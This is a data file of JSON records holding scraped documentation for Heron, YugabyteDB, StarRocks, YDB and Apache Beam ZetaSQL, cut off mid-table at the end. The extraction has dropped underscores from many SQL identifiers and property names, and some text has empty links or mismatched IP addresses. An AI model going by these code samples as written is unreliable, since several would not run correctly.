heron.class.scheduler: org.apache.heron.scheduler.local.LocalScheduler heron.class.launcher: org.apache.heron.scheduler.local.LocalLauncher heron.scheduler.local.working.directory: ${HOME}/.herondata/topologies/${CLUSTER}/${TOPOLOGY} heron.package.core.uri: file://${HERON_DIST}/heron-core.tar.gz heron.directory.sandbox.java.home: ${JAVA_HOME} ```" } ]
{ "category": "App Definition and Development", "file_name": "vm.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: Install and upgrade issues on virtual machines headerTitle: Install and upgrade issues on virtual machines linkTitle: Install and upgrade issues description: Troubleshoot issues encountered when installing or upgrading YugabyteDB Anywhere on virtual machines. menu: v2.18_yugabyte-platform: identifier: install-upgrade-vm-issues parent: troubleshoot-yp weight: 10 type: docs <ul class=\"nav nav-tabs-alt nav-tabs-yb\"> <li> <a href=\"../vm/\" class=\"nav-link active\"> <i class=\"fa-solid fa-building\"></i> Virtual machine</a> </li> <li> <a href=\"../kubernetes/\" class=\"nav-link\"> <i class=\"fa-regular fa-dharmachakra\" aria-hidden=\"true\"></i> Kubernetes </a> </li> </ul> Occasionally, you might encounter issues during installation and upgrade of YugabyteDB Anywhere on a virtual machine. Most of these issues are related to connections. If you experience difficulties while troubleshooting, contact . If your YugabyteDB Anywhere host has a firewall managed by firewalld enabled, then Docker Engine might not be able to connect to the host. To resolve the issue, you can open the ports using firewall exceptions by using the following commands: ```sh sudo firewall-cmd --zone=trusted --add-interface=docker0 sudo firewall-cmd --zone=public --add-port=80/tcp sudo firewall-cmd --zone=public --add-port=443/tcp sudo firewall-cmd --zone=public --add-port=8800/tcp sudo firewall-cmd --zone=public --add-port=5432/tcp sudo firewall-cmd --zone=public --add-port=9000/tcp sudo firewall-cmd --zone=public --add-port=9090/tcp sudo firewall-cmd --zone=public --add-port=32769/tcp sudo firewall-cmd --zone=public --add-port=32770/tcp sudo firewall-cmd --zone=public --add-port=9880/tcp sudo firewall-cmd --zone=public --add-port=9874-9879/tcp ``` The node access might not be available due to IP addresses that cannot be resolved. To remedy the situation, you can create mount paths on the nodes with private IP addresses `10.1.13.150`, `10.1.13.151`, and `10.1.13.152` by executing the following command: ```sh for IP in 10.1.12.103 10.1.12.104 10.1.12.105; do ssh $IP mkdir -p /mnt/data0; done ``` If a firewall is enabled for nodes, it might interfere with node connections. To resolve the issue, you can add firewall exceptions on the nodes with private IP addresses `10.1.13.150`, `10.1.13.151`, and `10.1.13.152` by executing the following command: ```sh for IP in 10.1.12.103 10.1.12.104 10.1.12.105; do ssh $IP firewall-cmd --zone=public --add-port=7000/tcp; ssh $IP firewall-cmd --zone=public --add-port=7100/tcp; ssh $IP firewall-cmd --zone=public --add-port=9000/tcp; ssh $IP firewall-cmd --zone=public --add-port=9100/tcp; ssh $IP firewall-cmd --zone=public --add-port=11000/tcp; ssh $IP firewall-cmd --zone=public --add-port=12000/tcp; ssh $IP firewall-cmd --zone=public --add-port=9300/tcp; ssh $IP firewall-cmd --zone=public --add-port=9042/tcp; ssh $IP firewall-cmd --zone=public --add-port=6379/tcp; done ``` <!-- For YugabyteDB Anywhere HTTPS configuration, you should set your own key or certificate. If you do provide this setting, the default public key is used, creating a potential security risk. -->" } ]
{ "category": "App Definition and Development", "file_name": "async-transactional-tables.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: Handling DDLs in transactional xCluster headerTitle: Handling DDLs linkTitle: Handling DDLs description: How to handle DDLs when using transactional xCluster replication between universes headContent: Handling DDLs in transactional xCluster menu: stable: parent: async-replication-transactional identifier: async-transactional-tables weight: 50 type: docs When DDL operations are performed to databases in transactional xCluster replication (such as creating, altering, or dropping tables or partitions), the statements must be executed on both the Primary/Source and Standby/Target and the xCluster configuration must be updated. You should perform these actions in a specific order, depending on the type of DDL, as indicated in the table below. | DDL | Step 1 | Step 2 | Step 3 | | : | : | : | : | | CREATE TABLE | Execute DDL on Primary | Execute DDL on Standby | Add the table to replication | | CREATE TABLE foo PARTITION OF bar | Execute DDL on Primary | Execute DDL on Standby | Add the table to replication | | DROP TABLE | Remove the table from replication | Execute DDL on Standby | Execute DDL on Primary | | CREATE INDEX | Execute DDL on Primary | Execute DDL on Standby | - | | DROP INDEX | Execute DDL on Standby | Execute DDL on Primary | - | | ALTER TABLE or INDEX | Execute DDL on Standby | Execute DDL on Primary | - | To ensure that data is protected at all times, set up replication on a new table before inserting any into it. If a table already has data before adding it to replication, then adding the table to replication can result in a backup and restore of the entire database. Add tables to replication in the following sequence: Create the table on the Primary. Create the table on the Standby. Add the table to the replication. For instructions on adding tables to replication, refer to . Remove tables from replication in the following sequence: Remove the table from replication. For instructions on removing tables from replication, refer to" }, { "data": "Drop the table from both Primary and Standby databases separately. Indexes are automatically added to replication in an atomic fashion after you create the indexes separately on Primary and Standby. You do not have to stop the writes on the Primary. Note: The Create Index DDL may kill some in-flight transactions. This is a temporary error. Retry any failed transactions. Add indexes to replication in the following sequence: Create an index on the Primary. Wait for index backfill to finish. Create the same index on Standby. Wait for index backfill to finish. For instructions on monitoring backfill, refer to . When an index is dropped it is automatically removed from replication. Remove indexes from replication in the following sequence: Drop the index on the Standby universe. Drop the index on the Primary universe. Adding a table partition is similar to adding a table. The caveat is that the parent table (if not already) along with each new partition has to be added to the replication, as DDL changes are not replicated automatically. Each partition is treated as a separate table and is added to replication separately (like a table). For example, you can create a table with partitions as follows: ```sql CREATE TABLE order_changes ( order_id int, change_date date, type text, description text) PARTITION BY RANGE (change_date); ``` ```sql CREATE TABLE orderchangesdefault PARTITION OF order_changes DEFAULT; ``` Create a new partition: ```sql CREATE TABLE orderchanges202301 PARTITION OF orderchanges FOR VALUES FROM ('2023-01-01') TO ('2023-03-30'); ``` Assume the parent table and default partition are included in the replication stream. To add a table partition to the replication, follow the same steps for . To remove a table partition from replication, follow the same steps as . You can alter the schema of tables and indexes without having to stop writes on the Primary. Note: The ALTER DDL may kill some in-flight transactions. This is a temporary error. Retry any failed transactions. Alter the schema of tables and indexes in the following sequence: Alter the index on the Standby universe. Alter the index on the Primary universe." } ]
{ "category": "App Definition and Development", "file_name": "ineat.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Ineat\" icon: /images/logos/powered-by/ineat.png hasLink: \"https://ineat.fr/\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -->" } ]
{ "category": "App Definition and Development", "file_name": "create_partitioned_materialized_view.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" This topic introduces how to create a partitioned materialized view to accommodate different use cases. StarRocks' asynchronous materialized views support a variety of partitioning strategies and functions that allow you to achieve the following effects: Incremental construction When creating a partitioned materialized view, you can set the creation task to refresh partitions in batches to avoid excessive resource consumption. Incremental refresh You can set the refresh task to update only the corresponding partitions of the materialized view when it detects data changes in certain partitions of the base table. Partition-level refresh can significantly prevent the waste of resources used to refresh the entire materialized view. Partial materialization You can set TTL for materialized view partitions, allowing for partial materialization of the data. Transparent query rewrite Queries can be rewritten transparently based on only those updated materialized view partitions. Partitions that are deemed outdated will not be involved in the query plan, and the query will be executed on the base tables to guarantee the consistency of data. A partitioned materialized view can be created only on a partitioned base table (usually a fact table). Only by mapping the partition relationship between the base table and the materialized view can you build the synergy between them. Currently, StarRocks supports building partitioned materialized views on tables from the following data sources: StarRocks OLAP tables in the default catalog Supported partitioning strategy: Range partitioning Supported data types for Partitioning Key: INT, DATE, DATETIME, and STRING Supported table types: Primary Key, Duplicate Key, Aggregate Key, and Unique Key Supported both in shared-nothing cluster and shared-data cluster Tables in Hive Catalog, Hudi Catalog, Iceberg Catalog, and Paimon Catalog Supported partitioning level: Primary level Supported data types for Partitioning Key: INT, DATE, DATETIME, and STRING :::note You cannot create a partitioned materialized view based on a non-partitioned base (fact) table. For StarRocks OLAP tables: Currently, list partitioning and expression partitioning are not supported. The two adjacent partitions of the base table must have consecutive ranges. For multi-level partitioned base tables in external catalogs, only the primary level partitioning path can be used to create a partitioned materialized view. For example, for a table partitioned in the `yyyyMMdd/hour` format, you can only build the materialized view partitioned by `yyyyMMdd`. From v3.2.3, StarRocks supports creating partitioned materialized views upon Iceberg tables with , and the materialized views are partitioned by the column after the transformation. For more information, see . ::: Suppose there are base tables as follows: ```SQL CREATE TABLE IF NOT EXISTS par_tbl1 ( datekey DATE, -- DATE type date column used as the Partitioning Key. k1 STRING, v1 INT, v2 INT ) ENGINE=olap PARTITION BY RANGE (datekey) ( START (\"2021-01-01\") END (\"2021-01-04\") EVERY (INTERVAL 1 DAY) ) DISTRIBUTED BY HASH(k1); CREATE TABLE IF NOT EXISTS par_tbl2 ( datekey STRING, -- STRING type date column used as the Partitioning" }, { "data": "k1 STRING, v1 INT, v2 INT ) ENGINE=olap PARTITION BY RANGE (str2date(datekey, '%Y-%m-%d')) ( START (\"2021-01-01\") END (\"2021-01-04\") EVERY (INTERVAL 1 DAY) ) DISTRIBUTED BY HASH(k1); CREATE TABLE IF NOT EXISTS par_tbl3 ( datekeynew DATE, -- Equivalent column with partbl1.datekey. k1 STRING, v1 INT, v2 INT ) ENGINE=olap PARTITION BY RANGE (datekey_new) ( START (\"2021-01-01\") END (\"2021-01-04\") EVERY (INTERVAL 1 DAY) ) DISTRIBUTED BY HASH(k1); ``` You can create a materialized view whose partitions correspond to the partitions of the base table one-to-one by using the same Partitioning Key. If the Partitioning Key of the base table is the DATE or DATETIME type, you can directly specify the same Partitioning Key for the materialized view. ```SQL PARTITION BY <basetablepartitioning_column> ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv1 REFRESH ASYNC PARTITION BY datekey AS SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 GROUP BY datekey, k1; ``` If the Partitioning Key of the base table is the STRING type, you can use the function to convert the date string into the DATE or DATETIME type. ```SQL PARTITION BY str2date(<basetablepartitioning_column>, <format>) ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv2 REFRESH ASYNC PARTITION BY str2date(datekey, '%Y-%m-%d') AS SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl2 GROUP BY datekey, k1; ``` You can create a materialized view whose partitioning granularity is larger than that of the base table by using the function on the Partitioning Key. When data changes are detected in the partitions of the base table, StarRocks refreshes the corresponding rollup partitions in the materialized view. If the Partitioning Key of the base table is the DATE or DATETIME type, you can directly use the date_trunc function on the Partitioning Key of the base table. ```SQL PARTITION BY datetrunc(<format>, <basetablepartitioningcolumn>) ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv3 REFRESH ASYNC PARTITION BY date_trunc('month', datekey) AS SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 GROUP BY datekey, k1; ``` If the Partitioning Key of the base table is the STRING type, you must convert the Partitioning Key of the base table into the DATE or DATETIME type in the SELECT list, set an alias for it, and use it in the date_trunc function to specify the Partitioning Key of the materialized view. ```SQL PARTITION BY datetrunc(<format>, <mvpartitioning_column>) AS SELECT str2date(<basetablepartitioningcolumn>, <format>) AS <mvpartitioning_column> ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv4 REFRESH ASYNC PARTITION BY datetrunc('month', mvdatekey) AS SELECT datekey, k1, sum(v1) AS SUM, str2date(datekey, '%Y-%m-%d') AS mv_datekey FROM par_tbl2 GROUP BY datekey, k1; ``` The partition rollup method mentioned above only allows partitioning the materialized view based on specific time granularities and does not permit customizing the partition time range. If your business scenario requires partitioning using a customized time granularity, you can create a materialized view and define the time granularity for its partitions by using the date_trunc function with the or function, which can convert a given time into the beginning or end of a time interval based on the specified time" }, { "data": "You need to define the new time granularity (interval) by using the timeslice or dateslice function on the Partitioning Key of the base table in the SELECT list, set an alias for it, and use it in the date_trunc function to specify the Partitioning Key of the materialized view. ```SQL PARTITION BY datetrunc(<format>, <mvpartitioning_column>) AS SELECT -- You can use timeslice or dateslice. dateslice(<basetablepartitioningcolumn>, <interval>) AS <mvpartitioningcolumn> ``` Example: ```SQL CREATE MATERIALIZED VIEW par_mv5 REFRESH ASYNC PARTITION BY datetrunc('day', mvdatekey) AS SELECT k1, sum(v1) AS SUM, timeslice(datekey, INTERVAL 5 MINUTE) AS mvdatekey FROM par_tbl1 GROUP BY datekey, k1; ``` You can create a materialized view whose partitions are aligned with those of multiple base tables, as long as the partitions of the base tables can align with each other, that is, the base tables use the same type of Partitioning Key. You can use JOIN to connect the base tables, and set the Partition Key as the common column. Alternatively, you can connect them with UNION. The base tables with aligned partitions are called reference tables. Data changes in any of the reference tables will trigger the refresh task on the corresponding partitions of the materialized view. This feature is supported from v3.3 onwards. ```SQL -- Connect tables with JOIN. CREATE MATERIALIZED VIEW par_mv6 REFRESH ASYNC PARTITION BY datekey AS SELECT par_tbl1.datekey, par_tbl1.k1 AS t1k1, par_tbl3.k1 AS t2k1, sum(par_tbl1.v1) AS SUM1, sum(par_tbl3.v1) AS SUM2 FROM partbl1 JOIN partbl3 ON partbl1.datekey = partbl3.datekey_new GROUP BY par_tbl1.datekey, t1k1, t2k1; -- Connect tables with UNION. CREATE MATERIALIZED VIEW par_mv7 REFRESH ASYNC PARTITION BY datekey AS SELECT par_tbl1.datekey, par_tbl1.k1 AS t1k1, sum(par_tbl1.v1) AS SUM1 FROM par_tbl1 GROUP BY par_tbl1.datekey, par_tbl1.k1 UNION ALL SELECT partbl3.datekeynew, par_tbl3.k1 AS t2k1, sum(par_tbl3.v1) AS SUM2 FROM par_tbl3 GROUP BY partbl3.datekeynew, par_tbl3.k1; ``` You can create a partitioned materialized view that refreshes by partitions to achieve incremental updates of the materialized view and transparent rewrite of queries with partial data materialization. To achieve these goals, you must consider the following aspects when creating a materialized view: Refresh granularity You can use the property `partitionrefreshnumber` to specify the granularity of each refresh operation. `partitionrefreshnumber` controls the maximum number of partitions to be refreshed in a refresh task when a refresh is triggered. If the number of partitions to be refreshed exceeds this value, StarRocks will split the refresh task and complete it in batches. The partitions are refreshed in chronological order from the least recent partition to the most recent partition (excluding partitions created dynamically for the future). The default value of `partitionrefreshnumber` is `-1`, indicating the refresh task will not be split. Materialization scope The scope of the materialized data is controlled by the properties `partitionttlnumber` (for versions earlier than v3.1.5) or `partitionttl` (recommended for v3.1.5 and later). `partitionttlnumber` specifies the number of the most recent partitions to retain, and `partitionttl` specifies the time range of the materialized view data to retain. During each refresh, StarRocks arranges the partitions in chronological order, and retains only those who satisfy the TTL requirements. Refresh strategy Materialized views with automatic refresh strategies (`REFRESH ASYNC`) are automatically refreshed each time the base table data changes. Materialized views with regular refresh strategies (`REFRESH ASYNC [START (<start_time>)] EVERY (INTERVAL <interval>)`) are refreshed regularly at the interval" }, { "data": ":::note Materialized views with automatic refresh strategies and regular refresh strategies are refreshed automatically once the refresh tasks are triggered. StarRocks records and compares the data versions of each partition of the base table. A change in the data version indicates a data change in the partition. Once StarRocks detects a data change in the partition of the base table, it refreshes the corresponding partition of the materialized view. When no data changes are detected on the base table partition, the refresh for the corresponding materialized view partition is skipped. ::: Materialized views with manual refresh strategies (`REFRESH MANUAL`) can be refreshed only by manually executing the REFRESH MATERIALIZED VIEW statement. You can specify the time range of the partitions to be refreshed to avoid refreshing the whole materialized view. If you specify `FORCE` in the statement, StarRocks forcibly refreshes the corresponding materialized view or partitions regardless of whether the data in the base table is changed. By adding `WITH SYNC MODE` to the statement, you can make a synchronous call of the refresh task, and StarRocks returns the task result only when the task succeeds or fails. The following example creates a partitioned materialized view `parmv8`. If StarRocks detects data changes in a partition of the base table, it refreshes the corresponding partition in the materialized view. A refresh task is split into batches, each of which only refreshes one partition (`\"partitionrefreshnumber\" = \"1\"`). Only two most recent partitions are retained (`\"partitionttl_number\" = \"2\"`), the others are deleted during the refresh. ```SQL CREATE MATERIALIZED VIEW par_mv8 REFRESH ASYNC PARTITION BY datekey PROPERTIES( \"partitionttlnumber\" = \"2\", \"partitionrefreshnumber\" = \"1\" ) AS SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 GROUP BY datekey, k1; ``` You can use the REFRESH MATERIALIZED VIEW statement to refresh this materialized view. The following example makes a synchronous call to forcibly refresh some partitions of `par_mv8` within a certain time range. ```SQL REFRESH MATERIALIZED VIEW par_mv8 PARTITION START (\"2021-01-03\") END (\"2021-01-04\") FORCE WITH SYNC MODE; ``` Output: ```Plain +--+ | QUERY_ID | +--+ | 1d1c24b8-bf4b-11ee-a3cf-00163e0e23c9 | +--+ 1 row in set (1.12 sec) ``` With the TTL feature, only some of the partitions are retained in `par_mv8`. You have thus achieved the materialization of partial data, which is important in scenarios where most queries are against the recent data. The TTL feature allows you to transparently accelerate queries on new data (for example, within a week or month) with the materialized view while significantly saving storage costs. Queries that do not fall into this time range are routed to the base table. In the following example, Query 1 will be accelerated by the materialized view because it hits the partition that is retained in `par_mv8`, while Query 2 will be routed to the base table because it does not fall into the time range where the partitions are retained. ```SQL -- Query 1 SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 WHERE datekey='2021-01-04' GROUP BY datekey, k1; -- Query 2 SELECT k1, sum(v1) AS SUM, datekey FROM par_tbl1 WHERE datekey='2021-01-01' GROUP BY datekey, k1; ```" } ]
{ "category": "App Definition and Development", "file_name": "distributed_storage_interface.md", "project_name": "YDB", "subcategory": "Database" }
[ { "data": "Each blob has a 192-bit ID consisting of the following fields (in the order used for sorting): TabletId (64 bits): ID of the blob owner tablet. Channel (8 bits): Channel sequence number. Generation (32 bits): Generation in which the tablet that captured this blob was run. Step (32 bits): Blob group internal ID within Generation. Cookie (24 bits): ID to use if Step is insufficient. CrcMode (2 bits): Selects a mode for redundant blob integrity verification at the BlobStorage level. BlobSize (26 bits): Blob data size. PartId (4 bits): Fragment number when using blob erasure coding. At the \"BlobStorage <-> tablet\" communication level, this parameter is always 0 referring to the entire blob. Two blobs are considered different if at least one of the first five parameters (TabletId, Channel, Generation, Step, or Cookie) differs in their IDs. So it is impossible to write two blobs that only differ in BlobSize and/or CrcMode. For debugging purposes, there is string blob ID representation in `[TabletId:Generation:Step:Channel:Cookie:BlobSize:PartId]` format, for example, `[12345:1:1:0:0:1000:0]`. When writing a blob, the tablet selects the Channel, Step, and Cookie parameters. TabletId is fixed and must point to the tablet performing the write operation, while Generation must indicate the generation that the tablet performing the operation is running in. When performing reads, the blob ID is specified, which can be arbitrary, but preferably preset. Blobs are written in a logical entity called group. A special actor called DS proxy is created on every node for each group that is written to. This actor is responsible for performing all operations related to the group. The actor is created automatically through the NodeWarden service that will be described below. Physically, a group is a set of multiple physical devices (OS block devices) that are located on different nodes so that the failure of one device correlates as little as possible with the failure of another device. These devices are usually located in different racks or different datacenters. On each of these devices, some space is allocated for the group, which is managed by a special service called VDisk. Each VDisk runs on top of a block storage device from which it is separated by another service called PDisk. Blobs are broken into fragments based on with these fragments written to VDisks. Before splitting into fragments, optional encryption of the data in the group can be performed. This scheme is shown in the figure below. VDisks from different groups are shown as multicolored squares; one color stands for one" }, { "data": "A group can be treated as a set of VDisks: Each VDisk within a group has a sequence number, and disks are numbered 0 to N-1, where N is the number of disks in the group. In addition, the group disks are grouped into fail domains and fail domains into fail realms. Each fail domain usually has exactly one disk inside (although, in theory, it may have more, but this is not used in practice), while multiple fail realms are only used for groups whose data is stored in all three data centers. Thus, in addition to a group sequence number, each VDisk is assigned an ID that consists of a fail realm index, the index that a fail domain has in a fail realm, and the index that a VDisk has in the fail domain. In string form, this ID is written as `VDISK[GroupId:GroupGeneration:FailRealm:FailDomain:VDisk]`. All fail realms have the same number of fail domains, and all fail domains include the same number of disks. The number of the fail realms, the number of the fail domains inside the fail realm, and the number of the disks inside the fail domain make up the geometry of the group. The geometry depends on the way the data is encoded in the group. For example, for block-4-2 numFailRealms = 1, numFailDomainsInFailRealm >= 8 (only 8 fail realms are used in practice), numVDisksInFailDomain >= 1 (strictly 1 fail domain is used in practice). For mirror-3-dc numFailRealms >= 3, numFailDomainsInFailRealm >= 3, and numVDisksInFailDomain >= 1 (3x3x1 are used). Each PDisk has an ID that consists of the number of the node that it is running on and the internal number of the PDisk inside this node. This ID is usually written as NodeId:PDiskId. For example, 1:1000. If you know the PDisk ID, you can calculate the service ActorId of this disk and send it a message. Each VDisk runs on top a specific PDisk and has a slot ID comprising three fields (NodeID:PDiskId:VSlotId) as well as the above-mentioned VDisk ID. Strictly speaking, there are different concepts: a slot is a reserved location on a PDISK occupied by a VDisk while a VDisk is an element of a group that occupies a certain slot and performs operations with the slot. Similarly to PDisks, if you know the slot ID, you can calculate the service ActorId of the running VDisk and send it a message. To send messages from the DS proxy to the VDisk, an intermediate actor called BS_QUEUE is used. The composition of each group is not" }, { "data": "It may change while the system is running. Hence the concept of a group generation. Each \"GroupId:GroupGeneration\" pair corresponds to a fixed set of slots (a vector that consists of N slot IDs, where N is equal to group size) that stores the data of an entire group. Group generation is not to be confused with tablet generation since they are not in any way related. As a rule, groups of two adjacent generations differ by no more than one slot. A special concept of a subgroup is introduced for each blob. It is an ordered subset of group disks with a strictly constant number of elements that will store the blob's data and that depends on the encoding type (the number of elements in a group must be the same or greater). For single-datacenter groups with conventional encoding, this subset is selected as the first N elements of a cyclic disk permutation in the group, where the permutation depends on the BlobId hash. Each disk in the subgroup corresponds to a disk in the group, but is limited by the allowed number of stored blobs. For example, for block-4-2 encoding with four data parts and two parity parts, the functional purpose of the disks in a subgroup is as follows: | Number in the subgroup | Possible PartIds | |-|-| | 0 | 1 | | 1 | 2 | | 2 | 3 | | 3 | 4 | | 4 | 5 | | 5 | 6 | | 6 | 1,2,3,4,5,6 | | 7 | 1,2,3,4,5,6 | In this case, PartId=1..4 corresponds to data fragments (resulting from dividing the original blob into 4 equal parts), while PartId=5..6 stands for parity fragments. Disks numbered 6 and 7 in the subgroup are called handoff disks. Any part, either one or more, can be written to them. You can only write the respective blob parts to disks 0..5. In practice, when performing writes, the system tries to write 6 parts to the first 6 disks of the subgroup and, in the vast majority of cases, these attempts are successful. However, if any of the disks is not available, a write operation cannot succeed, which is when handoff disks kick in receiving the parts belonging to the disks that did not respond in time. It may turn out that several fragments of the same blob are sent to the same handoff disk as a result of complicated brakes and races. This is acceptable although it makes no sense in terms of storage: each fragment must have its own unique disk." } ]
{ "category": "App Definition and Development", "file_name": "operators.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "type: languages title: \"Beam ZetaSQL operators\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Operators are represented by special characters or keywords; they do not use function call syntax. An operator manipulates any number of data inputs, also called operands, and returns a result. Common conventions: Unless otherwise specified, all operators return `NULL` when one of the operands is `NULL`. The following table lists all supported operators from highest to lowest precedence. Precedence determines the order in which operators will be evaluated within a statement. <div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Order of Precedence</th> <th>Operator</th> <th>Input Data Types</th> <th>Name</th> <th>Operator Arity</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>.</td> <td><span> STRUCT</span><br></td> <td>Member field access operator</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>[ ]</td> <td>ARRAY</td> <td>Array position. Must be used with OFFSET or ORDINAL&mdash.</td> <td>Binary</td> </tr> <tr> <td>2</td> <td>-</td> <td>All numeric types</td> <td>Unary minus</td> <td>Unary</td> </tr> <tr> <td>3</td> <td>*</td> <td>All numeric types</td> <td>Multiplication</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>/</td> <td>All numeric types</td> <td>Division</td> <td>Binary</td> </tr> <tr> <td>4</td> <td>+</td> <td>All numeric types</td> <td>Addition</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>-</td> <td>All numeric types</td> <td>Subtraction</td> <td>Binary</td> </tr> <tr> <td>5 (Comparison Operators)</td> <td>=</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Equal</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>&lt;</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Less than</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>&gt;</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Greater than</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>&lt;=</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Less than or equal to</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>&gt;=</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Greater than or equal to</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>!=, &lt;&gt;</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Not equal</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>[NOT] LIKE</td> <td>STRING and byte</td> <td>Value does [not] match the pattern specified</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>[NOT] BETWEEN</td> <td>Any comparable types. See Data Types for list.</td> <td>Value is [not] within the range specified</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>[NOT] IN</td> <td>Any comparable types. See Data Types for list.</td> <td>Value is [not] in the set of values specified</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>IS [NOT] <code>NULL</code></td> <td>All</td> <td>Value is [not] <code>NULL</code></td> <td>Unary</td> </tr> <tr> <td>&nbsp;</td> <td>IS [NOT] TRUE</td> <td>BOOL</td> <td>Value is [not] TRUE.</td> <td>Unary</td> </tr> <tr> <td>&nbsp;</td> <td>IS [NOT] FALSE</td> <td>BOOL</td> <td>Value is [not] FALSE.</td> <td>Unary</td> </tr> <tr> <td>6</td> <td>NOT</td> <td>BOOL</td> <td>Logical NOT</td> <td>Unary</td> </tr> <tr> <td>7</td> <td>AND</td> <td>BOOL</td> <td>Logical AND</td> <td>Binary</td> </tr> <tr> <td>8</td> <td>OR</td> <td>BOOL</td> <td>Logical OR</td> <td>Binary</td> </tr> </tbody> </table> {{< /table >}} </div> Operators with the same precedence are left associative. This means that those operators are grouped together starting from the left and moving" }, { "data": "For example, the expression: `x AND y AND z` is interpreted as `( ( x AND y ) AND z )` The expression: ``` x * y / z ``` is interpreted as: ``` ( ( x * y ) / z ) ``` All comparison operators have the same priority and are grouped using left associativity. However, comparison operators are not associative. As a result, it is recommended that you use parentheses to improve readability and ensure expressions are resolved as desired. For example: `(x < y) IS FALSE` is recommended over: `x < y IS FALSE` <div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Operator</th> <th>Syntax</th> <th>Input Data Types</th> <th>Result Data Type</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>.</td> <td>expression.fieldname1...</td> <td><span> STRUCT</span><br></td> <td>Type T stored in fieldname1</td> <td>Dot operator. Can be used to access nested fields, e.g.expression.fieldname1.fieldname2...</td> </tr> <tr> <td>[ ]</td> <td>arrayexpression [positionkeyword (int_expression ) ]</td> <td>See ARRAY Functions.</td> <td>Type T stored in ARRAY</td> <td>position_keyword is either OFFSET or ORDINAL.</td> </tr> </tbody> </table> {{< /table >}} </div> All arithmetic operators accept input of numeric type T, and the result type has type T unless otherwise indicated in the description below: {{< table >}} <table> <thead> <tr> <th>Name</th> <th>Syntax</th> </tr> </thead> <tbody> <tr> <td>Addition</td> <td>X + Y</td> </tr> <tr> <td>Subtraction</td> <td>X - Y</td> </tr> <tr> <td>Multiplication</td> <td>X * Y</td> </tr> <tr> <td>Division</td> <td>X / Y</td> </tr> <tr> <td>Unary Minus</td> <td>- X</td> </tr> </tbody> </table> {{< /table >}} Result types for Addition and Multiplication: {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr><th>&nbsp;</th><th>INT64</th><th>FLOAT64</th></tr> </thead> <tbody><tr><td>INT64</td><td>INT64</td><td>FLOAT64</td></tr><tr><td>FLOAT64</td><td>FLOAT64</td><td>FLOAT64</td></tr></tbody> </table> {{< /table >}} Result types for Subtraction: {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr><th>&nbsp;</th><th>INT64</th><th>FLOAT64</th></tr> </thead> <tbody><tr><td>INT64</td><td>INT64</td><td>FLOAT64</td></tr><tr><td>FLOAT64</td><td>FLOAT64</td><td>FLOAT64</td></tr></tbody> </table> {{< /table >}} Result types for Division: {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr><th>&nbsp;</th><th>INT64</th><th>FLOAT64</th></tr> </thead> <tbody><tr><td>INT64</td><td>FLOAT64</td><td>FLOAT64</td></tr><tr><td>FLOAT64</td><td>FLOAT64</td><td>FLOAT64</td></tr></tbody> </table> {{< /table >}} Result types for Unary Minus: {{< table >}} <table> <thead> <tr> <th>Input Data Type</th> <th>Result Data Type</th> </tr> </thead> <tbody> <tr> <td>INT64</td> <td>INT64</td> </tr> <tr> <td>FLOAT64</td> <td>FLOAT64</td> </tr> </tbody> </table> {{< /table >}} All logical operators allow only BOOL input. <div 